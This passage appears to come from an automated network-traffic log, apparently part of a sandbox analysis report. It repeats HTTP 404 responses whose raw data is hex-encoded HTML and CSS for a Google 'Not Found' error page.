3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:28:15 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:28:18 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:28:20 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:28:23 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:28:26 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:28:29 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 